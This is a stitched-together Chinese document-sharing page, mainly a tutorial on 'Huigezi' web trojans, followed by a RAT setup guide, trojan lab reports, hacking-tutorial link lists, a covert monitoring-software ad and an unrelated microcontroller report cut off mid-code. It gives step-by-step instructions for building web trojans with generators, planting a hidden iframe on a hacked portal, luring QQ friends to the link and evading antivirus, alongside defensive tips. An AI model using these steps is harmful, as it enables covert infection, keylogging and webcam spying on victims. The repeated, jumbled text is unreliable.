灰鸽子网页木马从原理、制作到防范 - 360文档中心
灰鸽子网页木马从原理、制作到防范
灰鸽子”网页木马从原理、制作到防范
如果你访问××网站(国内某门户网站),你就会中灰鸽子木马。这是我一黑客朋友给我说的一句说。打开该网站的首页,经检查,我确实中了灰鸽子。怎么实现的呢?他说,他侵入了该网站的服务器并在网站主页上挂了网页木马;一些安全专家常说,不要打开陌生人发来的网址,为什么?
因为该网址很有可能就是一些不怀好意者精心制作的网页木马。
以上只是网页木马的两种形式,实际上网页木马还可以挂在多媒体文件(RM、RMVB、WMV、WMA、Flash)、电子邮件、论坛等多种文件和场合上。很可怕吧,那么用户如何防范网页木马呢?下面我们就先从网页木马
的攻击原理说起。
一、网页木马的攻击原理
首先明确,网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了该网页就会中木马。为什么说是黑客精心制作的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。
有朋友会说,打开一个网页,IE浏览器真的能自动下载程序和运行程序吗?如果IE真的能肆无忌惮地任意下载和运行程序,那天下还不大乱。
实际上,为了安全,IE浏览器是禁止自动下载程序特别是运行程序的,但是,IE浏览器存在着一些已知和未知的漏洞,网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。下面我举IE浏览器早期的一个漏洞
来分别说明这两个问题。
⒈自动下载程序
小提示:代码说明
a. 代码中“src”的属性为程序的网络地址,本例中“https://www.360docs.net/doc/029228260.html,/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序,这段代码能让网页下载该程序到浏览它的电脑上。
b. 也可以把木马程序上传到免费的主页空间上去,但免费空间出于安全的考虑,多数不允许上传exe文件,黑客可能变通一下把扩展名exe 改为bat或com,这样他们就可以把这些程序上传到服务器上了。
把这段代码插入到网页源代码的
…之间(如图1),然后用没打补丁的IE6打开,接下来,打开IE的临时目录,你会发现,在该文件夹中有一个“1.exe”文件,这也就是说,该网页已自动下载了我放置在Web服务器上的灰鸽子木马。
图1 网页木马示例
小提示:灰鸽子木马
为什么一定要用灰鸽子木马呢?因为灰鸽子是反弹型木马,该木马能绕过天网等大多数防火墙的拦截,中马后,服务端即被控端能主动连接控制端(客户端),也就是说,一旦被控端连接到Internet,在控制端那里,被控端就会“自动上线”(如图2)。
图2 灰鸽子控制短示例(汗!又一大毒枭:))
⒉自动运行程序
把这段代码插入到网页源代码的…之间,然后用IE 打开该网页,你会发现,这段代码可以在没有打相关补丁的IE6中自动打
开记事本。
这段代码使用了shell.application控件,该控件能使网页获得执行权限,替换代码中的“Notepad.exe”(记事本)程序,可以用它自动运
行本地电脑上的任意程序。
通过以上的代码我们可以看出,利用IE的漏洞,也就是说在网页中插入适当的代码,IE完全可以自动下载和运行程序,不过,IE一旦打了相关补丁,这些代码就会失去作用。另外,这些代码要运行和下载程序,有些杀毒软件的网页监控会视它们为病毒,为了逃避追杀,黑客可能会使用一些工具对网页的源代码进行加密处理(如图3)。
图3 加密后的网页代码
二、网页木马的基本用法
理解了网页木马攻击的原理,我们可以制作自己的网页木马,但这需要你根据IE漏洞写出利用代码。实际上,在网上有很多高手已写出了一些漏洞的利用代码,有的还把它写成了可视化的程序。在搜索引擎输入“网页木马生成器”进行搜索,你会发现,在网上有很多利用IE的各种漏洞编写的网页木马生成器,它们大都为可视化的程序,只要你有一个木马(该木马必须把它放置到网络上),利用这些生成器你就可以立即生成一个网页,该网页就是网页木马,只要他人打开这个网页,该网页就可以自动完成下载木马并运行(安装)木马的过程。
在我的电脑上我已下载了一个网页木马生成器,下面我们来看怎么生
成网页木马并让他人中木马。
第一步:启动该网页木马生成器,如图4所示,在文本框中输入木马
的网络地址,最后单击“生成”。
图4 网页木马生成器
第二步:在网页木马生成器的安装文件夹会生成一个网页文件,该文件就是我们在上一步生成的网页木马。上传该文件到自己的Web服务器或
免费主面空间。
现在好了,把上述网页在服务器上的地址(网址)通过QQ发给自己的好友,一旦他访问了该网页,该网页就会在他的电脑上自动下载并运行
你放置在网络上的木马。
现在你该明白安全专家劝告的“不要打开陌生人发来的网络地址”这句话的真谛了吧!实际上,即使人人都不打开陌生人发来的网址,也仍然有一些人“飞蛾补灯,自寻死路”,因为若大的Internet,总会有一些人会有意或无意地访问这些网址,而且,有些网页木马,还挂在一些知名网站上(根据知名网站的访问量,你算算吧,每天有多少人中了木马!)。
小提示:你可能还没想到,看电影,在论坛查看或回复帖子也能中木马。实际上,网页木马还可以挂在多媒体文件、电子邮件、论坛、CHM电
子书上,这样,用户一旦观看电影、查看或预览邮件(主要是一些用电子邮件群发器发送的垃圾邮件)、参与帖子,打开电子书,用户就会中网页
木马。
在下面我们只介绍黑客如何在知名网站上挂网页木马。下面来看这一段代码:iframe src="https://www.360docs.net/doc/029228260.html,/hk.htm" width="0"
height="0" frameborder="0">
小提示:“src”的属性“https://www.360docs.net/doc/029228260.html,/hk.htm”是上传到
服务器上的网页木马的网址。
把这段代码插入到某门户网站首页源代码的…之间,从表面上看,插入后该门户的首页并没有什么变化,但是,所有访问了该门户网站首页的人都会中木马,为什么会这样呢?这是因为这段代码中
中。
随着门户首页的打开而执行的。
图5 iframe标签示例
也许有人会问,如何把上述代码插入到门户网站首页的源代码中?这个问题问得好,本人才疏学浅,确实无法进入他们的服务器修改网页,但是黑客如果发现了这些服务器上的漏洞且获得了webshell权限,那么修改他们的网页就跟在本地制作一个网页一样容易。
有人还问,拿到服务器的webshell权限容易吗?如果你对网络安全比较关注,你会发现,经常有这个网站被黑了,那个网站的主页被修改了
的新闻爆出。
有人还问,门户的服务器几乎无漏洞可找,个人服务器的漏洞较多,你能进入吗?本人不是黑客,中华人民共和国的法律规定,入侵和篡改他人服务器上的信息是违法行为,希望大家共同维护网络安全。
以前,在网上打开一些有名的网站时杀毒软件也会报警,现在你明白其中的道理了吧。有些人在这些网站发帖子骂娘,看了本文,希望在骂娘
时你也能为那些垫背的站长想想。
三:网页木马的防范策略
网页木马的防范只靠杀毒软件和防火墙是远远不够的,因为一旦黑客使用了反弹端口的个人版木马(个人反汇编的一些杀毒软件无法识别的木马),那么杀毒软件和防火墙就无可奈何,所以,网页木马的防范要从它
的原理入手,从根子上进行防范。
㈠即时安装安全补丁
网页木马都是利用IE漏洞进行传播的,我们拿冰狐浪子的网页木马(用“冰狐浪子网页木马生成器”制作的网页木马)来说吧,该网页能绕过IE的安全设置,当用户连接到该网页时,它能在普通用户不知情的情况下在后台下载一个木马并运行(安装)该木马。所以,经常到微软网站去下载并安装最新的安全补丁是防范网页木马比较有效的办法。
㈡改名或卸载(反注册)最不安全的ActiveXObject(IE插件)在系统中有些ActiveXObject会运行EXE程序,比如本文中“自动运行程序”代码中的Shell.application控件,这些控件一旦在网页中获得了执行权限,那么它就会变为木马运行的“温床”,所以把这些控件改名或卸载能彻底防范利用这些控件的网页木马。但是ActiveXObject是为了
应用而出现的,而不是为了攻击而出现的,所有的控件都有它的用处,所以在改名或卸载一个控件之前,你必须确认这个控件是你不需要的,或者
即使卸载了也不关大体的。
⒈卸载(反注册)ActiveXObject
第一步:在“开始”菜单上单击“运行”,输入“CMD”命令打开命
令提示符窗口。
第二步:在命令提示符下输入“regsvr32.exe shell32.dll /u/s”,然后回车就能将Shell.application控件卸载。
如果日后我们希望继续使用这个控件的话,可以在命令提示符窗口中输入“regsvr32.exe shell32.dll /i/s”命令将它们重新安装(注册)。在上述命令中:“regsvr32.exe”是注册或反注册OLE对象或控件的命令,[/u]是反注册参数,[/s]是寂静模式参数,[/I]为安装参数。
⒉改名ActiveXObject
需要说明的是,改名一个控件时,控件的名称和CLSID(Class ID)都要改,并且要改彻底了。下面仍以Shell.application为例来介绍方法。
第一步:打开注册表编辑器,查找“Shell.application”。用这个
方法能找到两个注册表项:
“{13709620-C279-11CE-A49E-444553540000}”和
“Shell.application”。
第二步:把{13709620-C279-11CE-A49E-444553540000}改为{13709620-C279-11CE-A49E-444553540001},注意,不要和系统中的其它
CLSID重复。
第三步:把“Shell.application”改名为
“Shell.application_xxx”。以后用到这个控件的时候你使用这个名称
就可以正常调用此控件了。
㈢提高IE的安全级别,禁用脚本和ActiveX控件经笔者的测试,用冰狐浪子的“网页木马专业版生成器”生成的网页木马,只要调高IE的安全级别,或者禁用脚本,该网页木马就不起作用了。从木马的攻击原理我们可以看出,网页木马是利用IE脚本和ActiveX 控件上的一些漏洞下载和运行木马的,只要我们禁用了脚本和ActiveX控
件,就可以防止木马的下载和运行。
小提示:禁用脚本和ActiveX控件会使一些网页的功能和效果失去作用,所以是否禁用,你要根据自己对安全的需要来定。
第一步:在IE浏览器的菜单栏上选择“工具→Internet选项”打开
“Internet选项”对话框。
第二步:在“安全”选项卡上,在Internet和本地Internet区域,分别把滑块移动到最高(如图6),或者点击“自定义级别”,在打开的对话框上禁用脚本,禁用ActiveX控件。
灰鸽子使用方法 灰鸽子使用方法++网页木马生成和制作详解++图片噢!!! 2007-11-28 23:22:31| 分类:技术| 标签:|字号大中小订阅 一、工具:灰鸽子VIP 200 5破解版 服务端配置是最基础的,我大概说下重点.首先点”自动上线”,在”网易免费域名更新IP”处先申请一个免费域名,比如https://www.360docs.net/doc/029228260.html,,再点”更新IP到域名”,如果一次更新出错就反复多试几次,一般会成功 的 图1 再点”配置服务程序’,这里有几点值得注意: 1.”自动上线”处一定要填正确了,就填我们刚才申请的域名https://www.360docs.net/doc/029228260.html,,下面的”自动上线连 接密码”可不填,填写是为了安全. 2.关于破解:这也是最关键的地方,在运行鸽子客户端的时候我们先要运行它的破解文件,我们双击hosts.exe,自解压路径不能改变,至于为什么不能变大家想下就会明白了,然后运行http.exe,点”开始服务”(如果你本身的IIS开了的话应该先将其停止).前提步骤做好了,我们打开鸽子.如图2.在配置服务端的用户名和用户密码处随便填写即可.然后点”生成服务端”,到这服务端就生成了,每一步都是关键的,少一步, 服务端可能就不能生成.
二、制作网页木马 工具:专业版网页木马生成器[IFRAME溢出] 南域剑盟网页木马生成器 教主网页木马生成器 潜入者修改免杀版(备用) 光有服务端是不行的,必需要发给对方运行才行,那怎么让对方运行呢?直接将exe文件发给对方吗?基本上是很难成功的,我想最好是通过网页,让对方在浏览网页的时候不知不觉中马.做网页木马之前必需要有一个免费的空间让你放马.网上免费空间很多,大家去申请就是了.假设我们现在已经申请好了,空间地址为:https://www.360docs.net/doc/029228260.html,/setup.exe.前提具备了.我们开始工作!先使用专业版网页木马生成器.如图 3. 在”木马程序路径”上填写http;//https://www.360docs.net/doc/029228260.html,/setup.exe”,”生成的网页名1,2” 可以随便填,保持默认即可。下面一栏”对于IE5,IE5.5使用冰狐浪子超级木马”使用之前需要把setup.exe拷贝到chm目录中,在”木马程序名称”处填写setup.exe,在”生成后的chm文件名”处保持默认icyfox.chm即可,在”用于存放上面chm文件的完整地址处填写https://www.360docs.net/doc/029228260.html,/icyfox.htm,最后单击生成。将生成的
灰鸽子网页木马从原理、制作到防范 灰鸽子”网页木马从原理、制作到防范 如果你访问××网站(国内某门户网站),你就会中灰鸽子木马。这是我一黑客朋友给我说的一句说。打开该网站的首页,经检查,我确实中了灰鸽子。怎么实现的呢?他说,他侵入了该网站的服务器并在网站主页上挂了网页木马;一些安全专家常说,不要打开陌生人发来的网址,为什么? 因为该网址很有可能就是一些不怀好意者精心制作的网页木马。 以上只是网页木马的两种形式,实际上网页木马还可以挂在多媒体文件(RM、RMVB、WMV、WMA、Flash)、电子邮件、论坛等多种文件和场合上。很可怕吧,那么用户如何防范网页木马呢?下面我们就先从网页木马 的攻击原理说起。 一、网页木马的攻击原理 首先明确,网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了该网页就会中木马。为什么说是黑客精心制作的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。 有朋友会说,打开一个网页,IE浏览器真的能自动下载程序和运行程序吗?如果IE真的能肆无忌惮地任意下载和运行程序,那天下还不大乱。
实际上,为了安全,IE浏览器是禁止自动下载程序特别是运行程序的,但是,IE浏览器存在着一些已知和未知的漏洞,网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。下面我举IE浏览器早期的一个漏洞 来分别说明这两个问题。 ⒈自动下载程序 小提示:代码说明 a. 代码中“src”的属性为程序的网络地址,本例中“https://www.360docs.net/doc/029228260.html,/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序,这段代码能让网页下载该程序到浏览它的电脑上。 b. 也可以把木马程序上传到免费的主页空间上去,但免费空间出于安全的考虑,多数不允许上传exe文件,黑客可能变通一下把扩展名exe 改为bat或com,这样他们就可以把这些程序上传到服务器上了。 把这段代码插入到网页源代码的…之间(如图1),然后用没打补丁的IE6打开,接下来,打开IE的临时目录,你会发现,在该文件夹中有一个“1.exe”文件,这也就是说,该网页已自动下载了我放置在Web服务器上的灰鸽子木马。
木马演示实验 任务十木马演示 一、实验目的: 通过模拟演示木马程序,加深对恶意代码工作过程的理解,掌握恶意代码防范方法及清除方法。 二、实验环境: 两台预装WindowsXP的主机,通过网络互连 软件工具:冰河木马或灰鸽子木马 三、实验要求: 1.实训要求:使用冰河对远程计算机进行控制 2.实训步骤: (1)配置服务器程序:冰河的客户端程序为G-client.exe,在冰河的控制端可以对服务器端进行配置,如图1所示: 图1 冰河的安装路径、文件名、监听端口为: ;kernel32.exe ;7626。冰河在注册表设置的自我保护的内容,就是我们查杀时所要寻找的内容,配置完后生成服务器端程序为G-server.exe。服务器端一旦运行,该程序就会按照前面的设置在C:\WINNT\system32下生成kernel32.exe和sysexplr.exe,并删除自身。Kernel32.exe在系统启动时自动加载运行,在注册表中sysexplr.exe和TXT文件关联,如图2所示:
图2 (2)传播木马:通过邮件、QQ等方式传播该木马服务器程序,并诱惑被攻击者运行改程序。 (3)客户端(控制端)操作:冰河的客户端界面如图3所示,冰河的功能是:自动跟踪目标机屏幕变化、记录各种口令信息、获取系统信息、限制系统功能、远程文件操作、注册表操作、发送信息等 图3 (4)冰河木马的防御:中了该木马后,该计算机会主动打开端口等待控制端来连接。这样很容易被人发现,而安装了防火墙的计算机会阻止该计算机主动对外的连接。所以安装防火墙是对传统木马的有效防御。
(5)冰河木马的手工清除方法: A、删除C:\WINNT\system下的kernel32.exe和sysexplr.exe文件 B、删除注册表HKEY_LOCAL_MACHINE\software\microsoft\windows\current version\Run 下键值为C:\WINNT\system\kernel32.exe C、删除注册表HKEY_LOCAL_MACHINE\software\microsoft\windows\current version\Run 下键值为C:\WINNT\system\sysexplr.exe D、修改注册表HKEY_CLASSES_ROOT\txtfile\shell\open\command下的默认值,将中木马 后的C:\WINNT\system32\sysexplr.exe%1改为正常的C:\WINNT\notepad.exe%1即可恢复TXT文件关联功能。 3.编写总结报告
灰鸽子使用教程图解 灰鸽子使用教程图解 (考虑到灰鸽子技术性较强和传插黑客技术要低调,将网络人远程控制教程放第一部份,灰鸽子教程放在了文章后面第二部份,请大家耐心观看) 第一部份:网络人远程监控软件 网络人远程控制个人版分为Netman办公版与Netman监控版。两个版本主要区别在于:Netman办公版连接远程电脑时,对方会弹出提示,知道电脑正在远程连接,主要用于个人远程控制、远程办公、远程协助和远程桌面连接等方面使用,是一款免费的远程控制软件;Netman监控版使用会员登录后再连接,远程电脑无任何提示,对方不会发觉,主要用于监管孩童电脑,掌握孩子上网情况,保护孩子健康上网。 Netman监控版详细安装方法: 1.要实现远程监控控制,双方都要安装Netman监控版,双方电脑的安装方法一样,控制端同时也是被控端,只要知道ID和密码,双方可以互相控制。 2.下载软件解压缩后,双击“Netman监控版.EXE”,软件默认安装路径为“C:\Program
式,需要自己进入安装文件夹,双击iexplore.exe启动软件,这时会弹出一个提示窗口,问是否要让软件随系统启动,通常直接点“确定”。 3.完成以上操作后,再按ctrl+y即可呼出软件主界面。监控版必须使用会员登录才能实现监控功能,所以呼出主界面后,应点击免费注册会员。
4.注册好会员后,点“选项”-“会员登录”,填上注册好的会员号。 5.第一次使用会员登录时,会弹出“设置控制密码”选项,需要注意的是,这里修改的不是前面填写的“登录密码”,而是从其他电脑连接本电脑时需要输入的“控制密码”。很多用户会误以为这里是修改“登录密码”,导致第二次使用会员登录时,发现登录密码不正确。 出于安全考虑,网络人设置了“登录密码”与“控制密码”两道密码保护,“登录密码”用于登录会员ID,“控制密码”则是其他电脑想要控制本地电脑时所需要填写的密码。想要修改这两个密码,可点击“选项”-“修改密码”。
关于灰鸽子的原理以及制作和清理 “灰鸽子”攻击原理以及制作和清理 院别计算机科学与通信工程学院专业计算机科学与技术 班级学号4090511 姓名唐盼 指导教师曲荣欣 成绩 2012年 6 月7 日
“灰鸽子”攻击原理以及制作和清理 一.灰鸽子简介: “灰鸽子”是一种远程控制软件. 最早出现的时候是在模仿前辈“冰河”。“灰鸽子”在2001年出现的,采用Delphi编写,最早并未以成品方式发布,更多的是以技术研究的姿态,采用了源码共享的方式出现在互联网,导致”灰鸽子”迅速发展起来.并且出现了多种不同的版本. “灰鸽子”在出现的时候使用了当时讨论最多的“反弹端口”连接方式,用以躲避大多数个人网络防火墙的拦截。由于服务端都以隐藏方式启动,就奠定了其恶意后门木马的地位. 而我个人就是高中时候,在”灰鸽子”最盛行和风靡的时候,开始认识”灰鸽子”和关注网络安全这个话题.这也是我最早认识和接触到一种黑客软件.在伴随着”灰鸽子”的盛行发展的同时,自己的对网络互联网安全问题的兴趣也随着同步提高.在有关黑客攻击和防范领域过程中享受这种成就感.但是对于”灰鸽子”的了解大多都是来自于<<电脑报>>,<<电脑爱好者>>这些杂志.没有深入了学习.但是”灰鸽子”这个概念却深入脑海.一直伴随我成长到如今.如今虽然”灰鸽子”已经不再流行,但是这个在我心底有着深刻影响的软件,已然成了一个黑客软件的代名词. 二,灰鸽子基本原理: “灰鸽子”客户端和服务端都是采用Delphi编写。黑客利用客户端程序配置出服务端程序。可配置的信息主要包括上线类型(如等待连接还是主动连接)、主动连接时使用的公网IP(域名)、连接密码、使用的端口、启动项名称、服务名称,进程隐藏方式,使用的壳,代理,图标等等。 客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。
灰鸽子实验报告 实 验 报 告 实验名称灰鸽子木马实验报告 课程名称网络安全 院系部:信息技术系专业班级:网络101 学生姓名:学号:20100901099
一、实验目的及要求: [目的] 1、了解灰鸽子是一个集多种控制方法于一体的木马病毒。 [内容及要求] 1、练习软件的哪些功能,自己总结 2、通过实验了解灰鸽子是一款的远程控制软件。 3、熟悉使用木马进行网络攻击的原理和方法。 [试验环境] 虚拟机下安装组建一个局域网,2台安装了win2000/win2003/XP系统的电脑,灰鸽子木马软件。 二、实验方法与步骤: (1)打开虚拟机,开启windows server 2003 A 与 windows server 2003 B ,将其网络设备器设置在同一局域网内(例vmnet2)
(2)打开灰鸽子,并查看本机IP地址: (3)点击配置服务程序,新建一个木马病毒:
密码可设置也可不设置 (3)将生产的木马病毒设法放入目标主机,并使其运行: (原始木马样子) (4)目标主机运行后,本机灰鸽子显示其登录: 我们可对目标及进行,下载上传等基本运行 (5)还可以进行更深层次的控制,例如屏幕捕捉与控制,广播,关机开机,注册表的编辑等(看红框标识处):
(6)灰鸽子木马的伪装,木马捆绑器: 现今社会杀毒软件的辨识度已然很高,而人们的警惕度也越来越 高,木马若想成功的被目标主机运行,必然要做一定的伪装
生成一个可执行文件,虽然风险乜很高,但不失为一种方法! (6)木马分离器: 三、使用心得 (1)熟悉灰鸽子之后,我们了解了木马的强大以及危害之处,如何防范木马,是当今信息社会的一种不可不重视的问题。 计算机病毒泛滥尤以木马病毒为甚。木马病毒是一种远程控制程 序,“黑客”利用计算机系统和软件的漏洞将一段程序植入远端电脑后,可以借助其配套的控制程序来远程控制中毒
很有价值的黑客教程 有4-5个它说有非法字符像08 05 07 12 你们只要把中间的空格删了就能上了在网上找到个FTP ftp://ftp.crazystudy.:2129/ ftp://ftp2.crazystudy.:2129/里面有教程 微软金牌讲师讲解组策略(视频教程)免费下载 .jinghuazhan./jianzhan/84/749.html 爱国者黑鹰一日一动画08年所有(更新至4.20)免费下载 .jinghuazhan./jianzhan/85/748.html 黑客动画吧最新教程5-25 的教程 .jinghuazhan./jianzhan/85/747.html 华夏黑客联盟2008年大型VIP培训黑客技术系列教程 .jinghuazhan./jianzhan/85/745.html 微软windows2008官方教学视频 .jinghuazhan./jianzhan/85/746.html 黑客防线c语言编程黑客特训班(全) .jinghuazhan./jianzhan/85/743.html 黑客基地Delphi vip教程(25课全)免费高速下载 .jinghuazhan./jianzhan/85/744.html 电脑E书大全,各种计算机技术书籍,电子书免费下载 .jinghuazhan./jianzhan/84/734.html 〖红娘工作室〗木马VIP免杀培训区视频教程15课免费下载 .jinghuazhan./jianzhan/85/742.html 黑客基地VIP教程1-104课免费高速下载 .jinghuazhan./jianzhan/85/741.html 华夏黑客同盟vip教程入侵和个人电脑收集 .jinghuazhan./jianzhan/85/598.html 黑客山庄基础脱壳免费教程 .jinghuazhan./jianzhan/85/596.html PYG 原创破解入门教程,破解基础讲解,暴破实例<精装友情通讯录> .jinghuazhan./jianzhan/85/593.html 黑客VIP特训班教程系列,DELPHI,黑客基地C语言等教程 .jinghuazhan./jianzhan/85/592.html (黑软VIP)黑白网络收费教程全集下载,黑吧.黑鹰.网安vip教程,黑鹰入侵VI .jinghuazhan./jianzhan/85/518.html 第一课: HTML语言之页面标记 .hxhack./bbs/hxjc/200801jc/2008010101.rar 第二课: HTML语言之字体标记 .hxhack./bbs/hxjc/200801jc/2008010102.rar 第三课: HTML语言之文字布局标记 .hxhack./bbs/hxjc/200801jc/2008010103.rar
灰鸽子原理及上线方法剖析 原创作者unis 远程控制分类与远程协助区别 远程控制技术是黑客必学的技术之一。远程控制不同于远程协助,两者之间有很大的区别,所谓远程协助需要经过被控端的授权允许,并且被控端可以看到控制者的所有操作,使之控制操作透明性;例如我们的QQ远程协助,就需要对方的允许控制进行操作,并且对方也能够看到我们的操作动作,远程协助一般是用来进行远程的计算机操作协助。远程控制则不一样,远程控制只要在被控者电脑安装一个服务端,即可在不知情的情况下进行控制对方计算机以及对计算机其它操作,控制时不需要经过对方的许可就可以控制,而控制时操作的一些动作,对方也无法察觉到(除鼠标控制)。远程控制按控制类型可以分类为:(1)正向主动型远程控制(2)反向被动型。什么是正向主动型的呢?正向主动型是需要控制着主动去连接被控端,一般情况下,控制者必须知道需要被控制者的IP和端口,然后通过某种软件来进行控制被控者,例如微软的3389远程桌面、Radmin远程控制、VNC远程控制都需要知道对方的IP(端口)然后通过客户端软件进行连接对方。反向被动型控制又可以称为反弹性控制技术,指的是在被控端下安装服务端之后,由被控端主动来寻找你的客户端监听端口软件连接来进行控制,这个好处就是不需要知道对方的IP地址和端口,被控端会自己主动来找我们的监听地址和端口,当我们发现被控端已经找到我们的监听地址和端口,我们就可以控制对方电脑,这样省去要知道对方的IP和端口的麻烦了,特别是对方是动态IP 的时候。反向被动型远控在黑客界已经是主流了,黑客专门使用某些控制软件在控制对方,反弹型远控软件更是数不胜数,例如:花鸽子(灰鸽子)、白金、终结者、Ghost 等等。 远程控制软件的功能与远控木马的特性 我们这里主要讲解的是反弹型远控,并且也有讲解到Web型的正向型远控,正向型远控还有Radmin、3389远程桌面也可以值得大家去学习,关于Radmin远控的可以参考我之前写的《深度研究Radmin远控》。关于3389终端技术我已经写了《精通3389终端》。现在的远程控制软件(又称客户端,生成出的木马叫服务端)数不胜数,甚至很多已经是源码爆出,对于各种远程控制软件来说,其实基本都是具备以下功能: 【屏幕监控】:可以查看被控制者的屏幕,保存捕获的被控制屏幕的截图。并且看到对方的一切操作,可以自由选定图像位色查看,还 可以选择是否控制对方鼠标、键盘,若选择即可控制对方的电脑鼠标、键盘,这一控制对方是可以看到鼠标被控制。 【文件管理】:可以在后台查看被控者的各个磁盘中的文件,直接显示隐藏文件,可自由在对方的磁盘中删除文件、上传文件、下载文 件、重命名文件、远程显示打开文件、远程
灰鸽子上线详细教程 Gray pigeons -- 灰鸽子是什么呢? 灰鸽子简单的说它是远程监控软件,(黑客类),当然也可以说他是一个病毒.木马或则说是后门之类的恶意软件 灰鸽子分为2个部分:客户端和服务端,把服务端发出去,别人下载后安装.....(当然也有不需要安装的以及IE版的只要下载[浏览]就中招)而你操纵着鸽子的客户端,你可以任意的操纵别人的电脑...-当然想让别人中招也不是那么容易的现在国内主流的杀毒软件很容易就把它和谐掉了.当然有你有杀毒软件别人也可以做出无视杀毒软件的服务端(简称:免杀),免杀的话那就是杀毒软件查不到那是一个木马程序! 鸽子是国内一款著名后门。比起前辈冰河、黑洞来,灰鸽子可以说是国内后门的集大成者。其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他后门都相形见绌。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。这就好比火药,用在不同的场合,给人类带来不同的影响!(其他的我也说不清楚)如果你会使的话那么它可以做很多事。NB点的黑客可以通过各种渠道得到它想要的东西,。(如QQ的刷钻刷QB等以及在网络上购买你想买的东西甚至其他更为贵重的物品,都可以通过它做到,当然要自己会用懂用) 总之灰鸽子在不同的人手里用法就不同,你可以拿它来逗你朋友,吓唬别人,整蛊别人,也可以拿它来刷QQ钻(前提是需要控制到宽带上网用户) 个人对鸽子的认识我对它的了解也不是全面的(现在我把鸽子的假设教程发出来喜欢耍的自己学着架设吧!) ------------------------------------ 架设教程 ------------------------------------- 首先下载灰鸽子-[你可以去百度搜索下载]我这里提供一个下载地址吧! 灰鸽子下载:https://www.360docs.net/doc/029228260.html,/file/t06ef189fa(不知道这个地址能活多久如果能下载就下吧下不到就自己去百度搜)
如何使用灰鸽子软件 灰鸽子[VIP 专业版] 1.只用一个端口来传输所有通讯数据!普通同类软件都用到了两个或两个以 上的端口来完成! 2.支持可以控制Internet连接共享、HTTP透明代理上网的电脑!软件智能读 取系统设定的代理服务器信息,无需用户设置! 3.无需知道服务端IP,自动上线功能让服务端自动上线报道!灰鸽子专用的 上线系统无需您注册免费域名才能使用,同时也提供了备用上线方式,在我们的专 用上线系统出现故障时,您可以使用备用上线方式来使用自动上线功能。在使用 专用上线系统时,你还可以控制远程电脑通过Socks5代理来中转自动上线。 4.自动上线可以在第一次设置分组,自定义上线图像,上线备注等,这样都 可以让你轻而易举的找到目标主机,同时设置连接密码保证了服务主机的安全性 !同时具用牵手版的搜索符合条件主机的功能: a.从主机窗口筛选:可以列出只有某个窗口的一批主机,可以轻松找到哪些人 在玩某个游戏! b.从主机进程筛选:可以列出运行了某个程序的一批主机,例如QQ.exe,就可 以找到打开了QQ的自动上线主机有哪些了! 5.文件管理:管理远程电脑的文件系统,支持复制、粘贴、删除,断点下载、 上传文件或文件夹,文件内容均以加密方式传输,确保通讯的安全性. 6.远程控制命令:包括远程系统信息、剪切板信息、进程管理、窗口管理、 键盘记录、服务管理、管理管理、MS-DOS模拟、代理服务控制! 7.注册表编辑器:可以像操作本机注册表一样的编辑远程注册表。 8.常用命令广播,让你控制主机众多主机更多的方便!详细的在线主机线表 显示了:主机IP地址,地址位置,电脑名称,系统版本,备注等信息, 9.除了具有语音监听、语音发送,还有远程视频监控功能,只有远程计算机 有摄像头,且正常打开没有被占用,那么你可以看到,远程摄像头捕获的图片!还 可以把远程摄像头捕获的画面存为Mpeg-1格式.远程语音也可以录制成Wav声音文件。 10.可以设置服务端开放Socks5代理服务器功能和HTTP代理服务功能!无需第 三方软件支持!支持Windows9x/ME/2000/Xp/2003。 11.软件附带有四款实用工具: a. EXE工具: 可以修改任何EXE文件图标,支持真彩色! b. 内网端口映射器: 它允许你将局域网内的服务映射到internet上,使 你在局域网内部也能使用自动上线功能! c. FTP服务器: 可以开本机FTP服务! d. Web服务器: 可以建立一个简单的Web服务器! 12.服务端程序在Windows 2000 / xp / 2003 可以以服务启动,支持发送多 种组合键,比如:Ctrl+Alt+del等等,适用于管理服务器主机!远程屏幕捕获还可以 录制为Mpeg-1文件格式. 13.全中文友好操作界面,让你一目了然,漂亮皮肤让使用时也倍感亲切! 功能简单介绍: 【1】对远程计算机文件管理:模枋Windows 资源管理器,可以对文件进行复制、粘贴、删除,重命名、远程运行等,可以上传下载文件或文件夹,操作简单易用
单片机原理及应用实验报告 单片机原理实验报告 专业:计算机科学与技术 学号: :
实验1 计数显示器 【实验目的】 熟悉Proteus仿真软件,掌握单片机原理图的绘图方法 【实验容】 (1)熟悉Proteus仿真软件,了解软件的结构组成与功能 (2)学习ISIS模块的使用方法,学会设置图纸、选元件、画导线、修改属性等基本操作 (3)学会可执行文件加载及程序仿真运行方法 (4)理解Proteus在单片机开发中的作用,完成单片机电路原理图的绘制【实验步骤】 (1)观察Proteus软件的菜单、工具栏、对话框等基本结构 (2)在Proteus中绘制电路原理图,按照表A.1将元件添加到编辑环境中(3)在Proteus中加载程序,观察仿真结果,检测电路图绘制的正确性 表A.1
Switches&Relays BUT BUTTON 【实验原理图】 【实验源程序】 #include sbit P3_7=P3^7; unsigned char x1=0;x2=0 ; unsigned char count=0; unsigned char idata buf[10]= {0x3f,0x06,0x5b,0x4f,0x66,0x6d,0x7d,0x07,0x7f,0x6f}; void delay(int time) { int k,j;
